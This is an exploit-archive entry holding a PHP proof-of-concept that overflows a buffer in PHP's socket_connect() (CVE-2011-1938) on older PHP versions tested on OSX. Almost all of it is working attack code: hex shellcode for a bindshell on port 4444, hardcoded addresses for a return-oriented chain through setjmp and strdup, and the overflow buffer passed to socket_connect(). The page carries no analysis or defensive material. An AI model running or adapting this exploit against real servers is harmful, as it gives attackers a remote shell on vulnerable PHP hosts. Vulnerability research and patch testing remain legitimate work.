ExploitFixes
PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability - [CVE: 2011-1938] 2011-05-25 16:15:05

# Exploit Title: php socket_connect() buffer overflow
# Date: 2011.05.25
# Author: S2 Crew [Hungary]
# Software Link: php.net
# Version: PHP 5.2.14 (tested) 5.3.3-5.3.6
# Tested on: OSX 10.5.8
# CVE: -

<?php

# Bindshell on port 4444
$sc =
"\xdb\xd2\x29\xc9\xb1\x27\xbf\xb1\xd5\xb6\xd3\xd9\x74\x24".
"\xf4\x5a\x83\xea\xfc\x31\x7a\x14\x03\x7a\xa5\x37\x43\xe2".
"\x05\x2e\xfc\x45\xd5\x11\xad\x17\x65\xf0\x80\x18\x8a\x71".
"\x64\x19\x94\x75\x10\xdf\xc6\x27\x70\x88\xe6\xc5\x65\x14".
"\x6f\x2a\xef\xb4\x3c\xfb\xa2\x04\xaa\xce\xc3\x17\x4d\x83".
"\x95\x85\x21\x49\xd7\xaa\x33\xd0\xb5\xf8\xe5\xbe\x89\xe3".
"\xc4\xbf\x98\x4f\x5f\x78\x6d\xab\xdc\x6c\x8f\x08\xb1\x25".
"\xc3\x3e\x6f\x07\x63\x4c\xcc\x14\x9f\xb2\xa7\xeb\x51\x75".
"\x17\x5c\xc2\x25\x27\x67\x2f\x45\xd7\x08\x93\x6b\xa2\x21".
"\x5c\x31\x81\xb2\x1f\x4c\x19\xc7\x08\x80\xd9\x77\x5f\xcd".
"\xf6\x04\xf7\x79\x27\x89\x6e\x14\xbe\xae\x21\xb8\x93\x60".
"\x72\x03\xde\x01\x43\xb4\xb0\x88\x47\x64\x60\xd8\xd7\xd5".
"\x30\xd9\x1a\x55\x01\x26\xf4\x06\x21\x6b\x75\xac";

$x = str_repeat("X",20);
$JMP_BUF = 0x8fe2e111;
$SETJMP = 0x8fe1cf38;
$STRDUP = 0x8fe210dc;
# 8fe24459 jmp *%eax
$JMP_EAX = 0x8fe24459;

$frag0 = "\x90\x58\x61\xc3";
$frag1 = "\x90\x58\x89\xe0".
"\x83\xc0\x0c\x89".
"\x44\x24\x08\xc3";

$a = str_repeat("A",188);

$buff =
$a.$frag0.pack("I",$SETJMP).pack("I",$JMP_BUF+32).pack("I",$JMP_BUF).$frag1.$x.pack("I",$SETJMP).pack("I",$JMP_BUF+24).pack("I",$JMP_BUF).pack("I",$STRDUP).pack("I",$JMP_EAX)."XXXX".$sc;

$s = socket_create(AF_UNIX, SOCK_STREAM, 0);
socket_connect($s,$buff,0);
?>